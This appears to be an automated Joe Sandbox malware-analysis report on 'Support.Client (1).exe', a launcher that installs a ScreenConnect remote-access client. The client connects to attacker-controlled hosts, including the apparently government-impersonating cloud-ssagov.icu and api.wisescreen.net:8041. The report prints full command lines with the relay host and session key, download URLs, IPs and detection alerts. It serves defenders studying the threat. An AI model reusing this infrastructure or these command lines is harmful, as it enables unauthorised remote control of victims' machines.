Edit tour

Windows Analysis Report
Support.Client (1).exe

Overview

General Information

Sample name:	Support.Client (1).exe
Analysis ID:	1555317
MD5:	ee2fd372b98d7899c7e12d85f4c7f695
SHA1:	22f704d299c0160038965ad41d6a486e5c125f55
SHA256:	021ecc419445fe19ca6a15e7367c88f8a4121023746acd94263fb3e156861e03
Infos:

Detection

ScreenConnect Tool

Score:	54
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	33
Range:	0 - 100

Signatures

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to hide user accounts

Creates files in the system32 config directory

Detected potential unwanted application

Enables network access during safeboot for specific services

Reads the Security eventlog

Reads the System eventlog

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

One or more processes crash

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64

Support.Client (1).exe (PID: 6872 cmdline: "C:\Users\user\Desktop\Support.Client (1).exe" MD5: EE2FD372B98D7899C7E12D85F4C7F695)

dfsvc.exe (PID: 6996 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)

ScreenConnect.WindowsClient.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

ScreenConnect.ClientService.exe (PID: 7516 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1" MD5: 75B21D04C69128A7230A0998086B61AA)

WerFault.exe (PID: 5820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 7144 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 1436 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 1220 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ScreenConnect.ClientService.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1" MD5: 75B21D04C69128A7230A0998086B61AA)

ScreenConnect.WindowsClient.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "e04200b7-51c0-4bc4-8341-7c372a508bae" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

ScreenConnect.WindowsClient.exe (PID: 7740 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "f3bbb14b-5a68-497e-a4df-886e478b3d62" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: dfsvc.exe PID: 6996	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7480	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.ClientService.exe PID: 7516	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.0.ScreenConnect.WindowsClient.exe.f0000.0.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Sigma Signatures

System Summary

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Source: Network Connection

Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49731, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6996, Protocol: tcp, SourceIp: 185.49.126.73, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7144, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T18:18:14.618715+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.4	49758	TCP
2024-11-13T18:18:52.068139+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.4	49767	TCP

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T18:18:08.450586+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49749	TCP
2024-11-13T18:18:09.799995+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49750	TCP
2024-11-13T18:18:14.695907+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49757	TCP
2024-11-13T18:18:16.078938+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49760	TCP
2024-11-13T18:18:18.971122+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49761	TCP
2024-11-13T18:18:20.743010+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49762	TCP
2024-11-13T18:18:22.288207+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49763	TCP
2024-11-13T18:18:23.625915+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49764	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.9% probability

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00611000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,

0_2_00611000

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	Jump to behavior

Uses 32bit PE files

Source: Support.Client (1).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: Support.Client (1).exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49764 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Support.Client (1).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client (1).exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA938000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1964904013.0000000000D02000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2932709226.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024038339.0000000000BC0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1953021568.0000000000D7D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA944000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA944000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA93C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969141037.000000001AC22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA93C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969141037.000000001AC22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5BE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1965505109.0000000004BA2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

Spreading

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\	Jump to behavior

Networking

Enables network access during safeboot for specific services

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe

Registry value created: NULL Service

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49766 -> 185.49.126.73:8041

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49757
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49763
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49764
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49767

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

